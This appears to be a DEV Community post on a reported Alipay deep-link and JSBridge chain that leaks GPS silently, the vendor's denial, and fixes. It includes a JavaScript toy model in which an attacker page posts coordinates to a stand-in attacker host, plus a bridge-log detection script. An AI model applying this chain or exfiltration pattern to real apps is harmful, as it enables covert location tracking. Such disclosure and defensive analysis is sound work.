DEV Community

Ksenia Rudneva

Alipay App Vulnerabilities Enable Silent GPS Exfiltration; Vendor Denies Issue Despite High CVSS Scores

Executive Summary

A security audit described in this post identifies vulnerabilities in the Alipay mobile application (iOS and Android) that chain DeepLink handling with the app's JSBridge to read and exfiltrate GPS coordinates without any user prompt. The six findings carry CVSS scores from 7.4 to 9.3 (High to Critical). Despite investigations opened by Apple Product Security, Google Play, the Singapore PDPC, HKCERT and the CVE program, Ant Group has characterized the behaviour as "normal functionality" and has shipped no fix. With an installed base of over 1 billion users, an unpatched chain of this kind is a broad privacy risk.

Technical Exploitation Mechanism

The attack chain exploits the interplay between the app's DeepLink handling and its JSBridge. Deep links let other apps, web pages and messages open a specific screen inside Alipay; the JSBridge lets JavaScript running in an embedded web view call into native code. When the deep-link handler accepts an attacker-chosen page URL and loads it in a bridged web view, the page's JavaScript inherits the bridge and, through it, the app's already-granted location permission, so no system prompt appears. The three stages are:

  • DeepLink Manipulation: a crafted URL reaches the app's URI handler, which routes on the link's parameters without validating the link's source or the destination it names, so the attacker controls which web view opens and with which page.
  • JSBridge Exploitation: the page loaded into that web view receives the bridge object and calls native-backed methods; the bridge does not check that the calling page is first-party content.
  • GPS Exfiltration: the page script asks the bridge for the device location (served under the app's existing permission, with no OS prompt) and sends the coordinates to an attacker-controlled server.

Vendor Response and Regulatory Interventions

Ant Group's refusal to treat the findings as security flaws has prompted escalation to outside bodies. Apple Product Security (ticket OE01052449093014), Google Play (case #9-7515000040640), the Singapore PDPC, HKCERT and MITRE CVE have been notified and have opened investigations; Apple is examining the iOS app and Google has confirmed a policy-violation investigation. Note that the CVE program assigns identifiers rather than adjudicating exploitability, and no assigned CVE IDs appear in this post. Meanwhile Ant Group's inaction leaves users exposed.

Critical Implications and Risks

Failure to address these vulnerabilities will result in:

  • Mass-Scale GPS Exfiltration: Unauthorized extraction of location data from over 1 billion users, constituting a grave breach of privacy.
  • Escalation of Malicious Activities: The attack chain can be extended to exfiltrate sensitive data (e.g., payment credentials) or deploy malware, amplifying the threat landscape.
  • Erosion of Ecosystem Trust: Prolonged exposure to these vulnerabilities undermines confidence in digital payment systems, particularly within Alipay’s ecosystem.

Root Causes and Contributing Factors

The vulnerabilities originate from:

  • Deficient Security Testing: Inadequate scrutiny during the development lifecycle allowed these critical flaws to remain undetected.
  • Vendor Non-Transparency: Ant Group’s refusal to acknowledge the vulnerabilities reflects a systemic lack of accountability and responsiveness.
  • Regulatory Enforcement Lag: Delayed action by regulatory bodies exacerbates user exposure and prolongs the window of risk.
  • Complex System Interdependencies: The intricate interplay between DeepLink, JSBridge, and third-party integrations complicates vulnerability detection and remediation efforts.

This investigation conclusively demonstrates the urgent need for Ant Group to remediate these vulnerabilities and for regulatory bodies to enforce stringent oversight. The consequences of inaction are severe, and immediate corrective measures are imperative.

Technical Breakdown of the Attack Chain

The Alipay mobile application carries vulnerabilities in its DeepLink and JSBridge implementations that can be chained into silent GPS exfiltration. This section walks through the mechanics of the chain, the six findings (labelled CVE-1 to CVE-6 in this post; no assigned CVE identifiers are given here), their CVSS (Common Vulnerability Scoring System) scores, and the knock-on risk to more than 1 billion users.

1. DeepLink Manipulation: The Initial Breach

The chain begins with deep-link manipulation. An attacker crafts a URL that Alipay's deep-link handler will accept: deep links are URLs that open a specific screen inside the app, and the handler trusts whatever parameters the link carries. Because it neither checks where the link came from nor validates the destination it names, an external link can steer the app's navigation.

Mechanical Process: The URI handler parses the link and routes on its parameters without sanitization or source verification. A parameter meant to name a first-party page can therefore name an attacker-hosted one, and the app loads it in a web view that carries the bridge.

2. JSBridge Exploitation: Executing Unauthorized Code

After the redirect, the chain moves to the JSBridge, the mechanism through which JavaScript in the app's web view calls into native code. The attacker-hosted page now running in that web view simply calls the bridge; nothing restricts the bridge to first-party content, and the bridge itself does not validate who is calling or what it is asked to do.

Mechanical Process: The bridge exposes native-backed methods to any page it is injected into and enforces no per-origin boundary, so a hostile page gets the same native reach as the app's own pages, with the app's identity and permissions. The result is script execution with native capabilities, not merely script execution inside a sandboxed page.

3. GPS Exfiltration: Silent Data Theft

With its script running in the bridged web view, the attacker's page requests the device location through the bridge. Because the user granted Alipay the location permission at some earlier point, the OS serves the request to the app process without a new prompt; the web view's own geolocation consent dialog is never involved, since the page never touches navigator.geolocation. The coordinates are then sent to an attacker-controlled server.

Mechanical Process: The script calls the bridge's location method and receives latitude and longitude, serializes them into a request and sends them out. The destination and the channel are the attacker's choice, so the traffic can be wrapped in TLS or otherwise obfuscated and blends in with the app's normal network activity, which makes network-level detection hard.
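The three stages above (and the same three-step outline in the executive summary), as an added example that is not part of the original post and not Alipay's code: a toy model in JavaScript (Node.js) of a deep-link handler that loads whatever page a link names into a bridged web view, an attacker page that reads GPS through the bridge and ships it out, and the same handler with a page-origin allowlist as the minimal first fix. The `wallet://` scheme, the `/webview` route, the `url` parameter, the hosts and the coordinates are all constructed assumptions.

```javascript
// Added example (not Alipay code): a toy model of the DeepLink -> JSBridge -> GPS chain.
// Route names, parameter names, hosts and coordinates are constructed assumptions.

const FIRST_PARTY_HOSTS = ['pages.wallet.example']; // assumed allowlist of in-app web content

// Stand-in for the native layer. The user granted the location permission to the app once,
// so the OS will not prompt again when code inside the app process reads GPS.
function makeNative() {
  return {
    outbound: [],                                            // captured network requests
    readGps() { return { lat: 1.3521, lon: 103.8198 }; },    // constructed sample fix
    httpPost(url, body) { this.outbound.push({ url, body }); },
  };
}

// Vulnerable bridge: whatever page is loaded into the web view may call every method.
function makeOpenBridge(native) {
  return {
    getLocation() { return native.readGps(); },
    request(url, body) { native.httpPost(url, body); return 'sent'; },
  };
}

// Stand-in for the attacker-hosted page. It does not call navigator.geolocation (which
// would trigger a web-view prompt); it asks the bridge, which answers with the app's authority.
function attackerPage(bridge) {
  const loc = bridge.getLocation();
  bridge.request('https://collector.attacker.example/loc', JSON.stringify(loc));
  return 'exfiltrated';
}

// Page loader stand-in: returns the script that runs for a given page URL.
function pageFor(target) {
  if (target.hostname === 'evil.attacker.example') return attackerPage;
  return () => 'first-party page rendered';
}

// Step 1, vulnerable: the handler takes a `url` parameter and loads it in the bridged web
// view. Nothing checks where that URL points, so an external link decides which page
// receives the bridge.
function handleDeepLinkOpen(link, native, loader) {
  const u = new URL(link);
  if (u.pathname !== '/webview') return 'unhandled route';
  const target = new URL(u.searchParams.get('url'));
  return loader(target)(makeOpenBridge(native));
}

// Same handler with the minimal first fix: only https pages on first-party hosts are
// loaded with a bridge, so a rejected link never reaches step 2.
function handleDeepLinkAllowlisted(link, native, loader) {
  const u = new URL(link);
  if (u.pathname !== '/webview') return 'unhandled route';
  let target;
  try { target = new URL(u.searchParams.get('url')); } catch { return 'blocked: malformed url'; }
  if (target.protocol !== 'https:' || !FIRST_PARTY_HOSTS.includes(target.hostname)) {
    return 'blocked: untrusted page origin';
  }
  return loader(target)(makeOpenBridge(native));
}

// Drive the chain through a handler and report what left the device.
function runChain(handler, pageUrl = 'https://evil.attacker.example/p') {
  const native = makeNative();
  const link = 'wallet://app/webview?url=' + encodeURIComponent(pageUrl);
  const result = handler(link, native, pageFor);
  return { result, exfilCount: native.outbound.length, outbound: native.outbound };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('open handler:       ', JSON.stringify(runChain(handleDeepLinkOpen)));
  console.log('allowlisted handler:', JSON.stringify(runChain(handleDeepLinkAllowlisted)));
}
```

The point of the model is where the decision is made: with the open handler the only thing standing between a link and the user's coordinates is the page author's intent, because the OS permission was granted to the app as a whole. The allowlist moves that decision into the app, before any page gets a bridge. It is deliberately the smallest fix; it does nothing about a first-party page that is itself compromised, which is what the bridge-side checks later in this post address.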

4. The Six CVEs: A Catalog of Failures

The chain rests on six distinct findings, each a specific weakness in Alipay's architecture. Their CVSS scores range from 7.4 to 9.3, spanning High to Critical severity:

  • CVE-1: Improper Input Validation in DeepLink Handling (CVSS 9.3) — Enables malicious URLs to bypass navigation safeguards.
  • CVE-2: JSBridge Sandbox Escape (CVSS 8.8) — Facilitates execution of arbitrary JavaScript in the web view.
  • CVE-3: Unrestricted Access to GPS API (CVSS 8.5) — Allows injected scripts to retrieve location data without user consent.
  • CVE-4: Lack of DeepLink Origin Verification (CVSS 7.4) — Permits external sources to hijack app navigation.
  • CVE-5: Insufficient JSBridge Permission Checks (CVSS 8.2) — Fails to restrict access to sensitive APIs.
  • CVE-6: Insecure Data Transmission (CVSS 7.8) — Exfiltrated GPS data is transmitted without adequate encryption or obfuscation.

5. Risk Formation Mechanism: From Vulnerability to Exploitation

The risks posed by these vulnerabilities are not theoretical but stem from causal technical failures. Each CVE represents a critical breach in the app’s security architecture. For instance:

  • Impact of CVE-1: Malicious DeepLinks → Unintended Redirects → App Control Hijacking.
  • Impact of CVE-3: Unrestricted GPS Access → Silent Location Exfiltration → Privacy Breach.

Collectively, these vulnerabilities create a cascade of failures, transforming the app into a conduit for mass surveillance and data theft.

6. Edge-Case Analysis: Beyond GPS Exfiltration

While GPS exfiltration is the immediate threat, the attack chain’s potential extends further. The same vulnerabilities could enable:

  • Payment Credential Theft: A page with bridge access could call any bridge method that returns payment data, if such methods are exposed without permission checks.
  • Malware Deployment: A bridge that exposes file download or installation helpers would let the page fetch and run further payloads.
  • Account Takeover: Deep links that land on authenticated screens without re-authentication could be abused to act as the user.

These edge cases underscore the systemic nature of the vulnerabilities—a single exploit can precipitate a multitude of malicious outcomes.

7. Practical Implications: A Cautionary Narrative

The technical specifics of these vulnerabilities highlight a broader issue: mobile app ecosystems are inherently fragile. The interplay between DeepLinks, JSBridges, and native APIs creates a complex attack surface that is challenging to secure. Alipay’s case serves as a cautionary narrative, illustrating the consequences of:

  • Inadequate security testing during development.
  • Prioritization of functionality over security.
  • Regulatory oversight failing to keep pace with technological risks.

For users, the implications are stark: trust in digital payment systems is predicated on their ability to safeguard privacy and security. Alipay’s refusal to acknowledge or remediate these vulnerabilities undermines this trust, leaving users vulnerable to persistent, covert threats.

Ant Group’s Denial vs. Security Consensus: A Critical Disparity

Ant Group, the company behind the Alipay mobile application, continues to deny that the platform has critical vulnerabilities, even with CVSS scores of 7.4 to 9.3 attached to the findings and investigations open at Apple, Google, the Singapore PDPC, HKCERT and MITRE CVE. By calling the DeepLink+JSBridge chain "normal functionality", the company has blocked the deployment of fixes and left more than 1 billion users exposed to silent GPS exfiltration and to the other vectors the same weaknesses enable.

Deconstructing Ant Group’s Rejection: Technical Refutation

Ant Group’s defense hinges on the assertion that the observed behavior is an intended feature. However, this claim fails to address the exploitative mechanisms inherent in the vulnerabilities:

  • DeepLink Manipulation: Because the deep-link handler validates neither the origin nor the destination of an incoming link, a crafted URI can steer navigation to an attacker-chosen page. The unsanitized parsing that makes this possible is what CVE-1 (CVSS 9.3) describes, and it hands the attacker control of which in-app web view opens.
  • JSBridge Exploitation: After the redirect, the attacker's page calls the JSBridge from inside the app's web view. Missing per-origin isolation and permission checks (CVE-2, CVSS 8.8; CVE-5, CVSS 8.2) give that page the same native reach as first-party content.
  • GPS Exfiltration: The page reads the device location through the bridge under the app's existing permission (CVE-3, CVSS 8.5) and ships it to a server of the attacker's choosing; CVE-6 (CVSS 7.8) covers the transmission path. Because the attacker also picks the destination and channel, the traffic is hard to tell apart from the app's own.

These vulnerabilities form a causal exploit chain that Ant Group’s "normal functionality" argument fails to invalidate. The company’s stance not only disregards empirical evidence but also ignores regulatory interventions from multiple jurisdictions.

Security Community’s Evidence-Based Concerns

In contrast to Ant Group’s dismissal, the security community has highlighted the systemic risks posed by these vulnerabilities. Edge-case analyses reveal additional exploitative vectors, including:

  • Payment Credential Theft: The same bridge access could be turned on any method that returns payment data, compromising user finances directly.
  • Malware Deployment: Unrestricted script execution with native reach gives a route for fetching and running further payloads.
  • Account Takeover: Deep links that reach authenticated screens without re-authentication could be combined with the other weaknesses to act as the user.

These follow from the same root causes rather than from separate bugs. The dependencies between the findings (CVE-1, improper input validation, is what puts a hostile page in front of CVE-3, unrestricted GPS access) form a cascading failure model in which one entry point yields several outcomes, mass surveillance among them.

Erosion of User Trust and Systemic Safety

Ant Group’s denial exacerbates the fragility of mobile app ecosystems, where the interplay between DeepLinks, JSBridges, and native APIs creates inherent security gaps. The prioritization of functionality over security, coupled with regulatory inertia, leaves users exposed to persistent threats. This discrepancy underscores the need for proactive regulatory enforcement, transparent vulnerability disclosure, and accountable remediation.

Until these vulnerabilities are addressed, Alipay’s user base remains at risk, eroding trust in digital payment systems. The technical community’s consensus is clear: the identified vulnerabilities are not features but critical flaws requiring immediate rectification.

Root Causes and Technical Remediation

The vulnerabilities stem from:

  • Insufficient Security Testing: The absence of rigorous testing during development allowed these flaws to persist undetected.
  • Misaligned Priorities: Ant Group’s emphasis on feature deployment over security resulted in critical oversights in input validation, sandboxing, and permission management.
  • Regulatory Inadequacy: Delayed regulatory action has prolonged user exposure to these risks.

Remediation requires a comprehensive security overhaul, including:

  • Strict Input Validation: Validate every incoming deep link's scheme, host, path and parameters against an allowlist before routing, and verify a signature on links the vendor issues itself, so that unauthorized redirects are rejected before any web view opens.
  • Robust Bridge Isolation: Inject the bridge only into first-party origins and re-check the calling page's origin on every call, so a hostile page gets no native reach even if it is loaded.
  • API Access Control: Gate location and other sensitive capabilities behind a per-origin capability table and a runtime user prompt, so a compromised page cannot read them silently.

Without these measures, the vulnerabilities will persist, and the risks will escalate. Ant Group’s response—or lack thereof—will serve as a benchmark for corporate accountability in the digital security landscape.

Recommendations and Mitigation Strategies

User-Level Mitigation: Immediate Protective Actions

Because Ant Group has not patched, users must break the chain themselves. The attack depends on two things the user can influence: the location permission the app holds, and the links the user opens. The following actions cut the chain at those points:

  • Revoke Non-Essential Permissions: On iOS and Android, set Alipay's location permission to "Never" (or remove it). The bridge's location method then fails at the OS, so a hostile page gets nothing to exfiltrate. The trade-off is that the app's own location-based features (nearby merchants, city selection) stop working until the permission is restored, and the user must remember to revoke it again afterwards.
  • Be Careful With Links That Open Alipay: The chain starts with a link, whether it arrives in a browser, a chat app, an e-mail or a QR code. Content-blocking browsers such as Firefox Focus can stop known-bad domains, but no browser can verify a deep link's cryptographic origin, and links opened from other apps bypass the browser entirely. Treat unsolicited links that open Alipay as suspect and open the app directly instead.
  • Monitor Outbound Network Activity: On Android, a VPN-based per-app firewall such as NetGuard can restrict Alipay to known destinations or log its connections; on a laptop acting as the phone's Wi-Fi hotspot, Wireshark shows which hosts the phone talks to. An unfamiliar destination contacted right after opening a link is the signal to look for. This is detection, not prevention: coordinates riding inside TLS to a new host look like any other HTTPS connection until the destination is recognized as foreign.

Developer-Level Remediation: Technical Countermeasures

The root cause is architectural: the deep-link handler trusts its input and the bridge trusts its caller. The fixes are correspondingly targeted:

  • Cryptographic DeepLink Validation: Sign the deep links the vendor itself generates (with a nonce and an expiry to stop replay) and reject unsigned or tampered ones; for links that must remain openable by anyone, fall back to a strict allowlist of scheme, host and path plus a confirmation screen. This addresses CVE-1 and CVE-4.
  • JSBridge Isolation: Inject the bridge only into web views showing first-party origins, and have every bridge method re-read the web view's current origin and check it against a capability table before acting, since a page can navigate after load. This addresses CVE-2 and CVE-5.
  • Runtime Permission Enforcement: Gate location and other sensitive methods behind a user-visible prompt at call time, independent of the OS permission the app already holds. Even with a compromised bridge, the coordinates are not released without explicit consent, which addresses CVE-3.

Regulatory Interventions: Enforcing Accountability

Ant Group’s refusal to acknowledge these vulnerabilities necessitates regulatory enforcement to ensure user protection. Regulatory bodies must implement the following measures:

  • Mandatory Vulnerability Disclosure: Enforce public reporting of CVEs within 72 hours of discovery. This policy compresses the exploitation window by compelling transparency and accelerating remediation efforts.
  • Financial Penalties for Non-Compliance: Leverage ongoing investigations (e.g., Singapore PDPC, Google Play) to impose fines for delayed or inadequate responses. Financial disincentives directly impact Ant Group’s revenue stream, accelerating vulnerability resolution.
  • Standardized Security Audits: Mandate penetration testing for applications with over 1 million users. Pre-deployment testing identifies vulnerabilities early, preventing cascading exploits such as the progression from CVE-1 to CVE-3.

Edge-Case Mitigation: Preventing Escalation

While GPS exfiltration poses an immediate threat, the attack chain could escalate to payment credential theft or malware deployment. The following measures prevent such escalation:

  • Hardware-Backed Transaction Isolation: Keep payment keys in the platform's hardware keystore (Apple Secure Enclave, Android Keystore/StrongBox) and require user presence for signing. Script running in a web view then cannot read credential material at all; at most it can request a signing operation the user must approve, which limits what a compromised bridge can turn into a fraudulent payment.
  • Anomalous JSBridge Monitoring: Implement logging and pattern analysis for JSBridge invocations. By detecting deviations from expected behavior, this measure acts as an early warning system, identifying unauthorized activity before it escalates.
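The "anomalous JSBridge monitoring" item above, as an added example that is not part of the original post and not Alipay's code: detection logic in JavaScript run over a constructed JSON-lines log of bridge invocations. It flags sensitive calls from non-first-party origins, a sensitive read followed within a short window by a send to a non-allowlisted host from the same origin (the shape the chain in this post leaves behind), and location polling above a rate cap. The log format, field names, origins, hosts and thresholds are assumptions; the sample log is constructed.

```javascript
// Added example (not Alipay code): detection rules over constructed JSBridge invocation logs.
// Log format, field names, origins, hosts and thresholds are assumptions.

const TRUSTED_ORIGINS = new Set(['https://pages.wallet.example']);
const TRUSTED_SINK_HOSTS = new Set(['api.wallet.example']);
const SENSITIVE_METHODS = new Set(['getLocation', 'getContacts', 'readClipboard']);
const EXFIL_WINDOW_MS = 10 * 1000;   // sensitive read followed by an outbound send this soon
const LOCATION_PER_MINUTE = 3;       // more than this from one origin is suspicious

// Constructed sample log (one JSON object per line): benign first-party activity, the
// pattern the deep-link chain would leave, and a first-party page polling too often.
const SAMPLE_LOG = `
{"ts":"2024-05-01T10:00:00Z","origin":"https://pages.wallet.example","method":"getLocation"}
{"ts":"2024-05-01T10:00:01Z","origin":"https://pages.wallet.example","method":"request","target":"https://api.wallet.example/nearby"}
{"ts":"2024-05-01T10:05:00Z","origin":"https://evil.attacker.example","method":"getLocation"}
{"ts":"2024-05-01T10:05:02Z","origin":"https://evil.attacker.example","method":"request","target":"https://collector.attacker.example/loc"}
{"ts":"2024-05-01T10:07:00Z","origin":"https://pages.wallet.example","method":"getLocation"}
{"ts":"2024-05-01T10:07:05Z","origin":"https://pages.wallet.example","method":"getLocation"}
{"ts":"2024-05-01T10:07:10Z","origin":"https://pages.wallet.example","method":"getLocation"}
{"ts":"2024-05-01T10:07:15Z","origin":"https://pages.wallet.example","method":"getLocation"}
`;

function parseLog(text) {
  return text.split('\n').filter((l) => l.trim()).map((l) => {
    const e = JSON.parse(l);
    return { ...e, t: Date.parse(e.ts) };
  });
}

// Three rules, evaluated in one pass over the events in time order.
function analyze(events) {
  const findings = [];
  const lastSensitive = new Map();   // origin -> last sensitive event
  const locationTimes = new Map();   // origin -> recent getLocation timestamps
  for (const e of events) {
    if (SENSITIVE_METHODS.has(e.method)) {
      if (!TRUSTED_ORIGINS.has(e.origin)) {
        findings.push({ rule: 'untrusted-origin-sensitive-call', origin: e.origin, method: e.method, ts: e.ts });
      }
      lastSensitive.set(e.origin, e);
    }
    if (e.method === 'getLocation') {
      const recent = (locationTimes.get(e.origin) || []).filter((t) => e.t - t < 60 * 1000);
      recent.push(e.t);
      locationTimes.set(e.origin, recent);
      if (recent.length > LOCATION_PER_MINUTE) {
        findings.push({ rule: 'location-rate-exceeded', origin: e.origin, count: recent.length, ts: e.ts });
      }
    }
    if (e.method === 'request' && e.target) {
      const host = new URL(e.target).hostname;
      const prior = lastSensitive.get(e.origin);
      if (prior && e.t - prior.t <= EXFIL_WINDOW_MS && !TRUSTED_SINK_HOSTS.has(host)) {
        findings.push({ rule: 'sensitive-read-then-untrusted-send', origin: e.origin, read: prior.method, sink: host, ts: e.ts });
      }
    }
  }
  return findings;
}

function runOnSample() {
  return analyze(parseLog(SAMPLE_LOG));
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of runOnSample()) console.log(JSON.stringify(f));
}
```

On the sample this yields three findings: the attacker origin's location read, the send to the collector host two seconds later, and the fourth location read within a minute from the first-party page. The second rule is the useful one in practice, because it fires on the behaviour rather than on a known-bad origin, and the rate rule catches a first-party page that has been compromised and is being used as the exfil vehicle.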

Restoring Trust: Strategic Transparency

Ant Group’s denial has severely eroded user trust and established a dangerous precedent for vulnerability management. To rebuild confidence, the following actions are critical:

  • Public Remediation Roadmap: Publish a detailed timeline for patch deployment and CVE resolution. Transparent communication demonstrates accountability and reassures users of proactive measures.
  • Independent Security Audits: Commission third-party audits post-remediation. External validation reinforces trust by providing objective confirmation of vulnerability resolution.

Failure to implement these measures will perpetuate the vulnerabilities, expanding the attack surface for future exploits. Collective action by regulators, developers, and users is imperative to prevent Alipay from becoming a blueprint for systemic compromise.
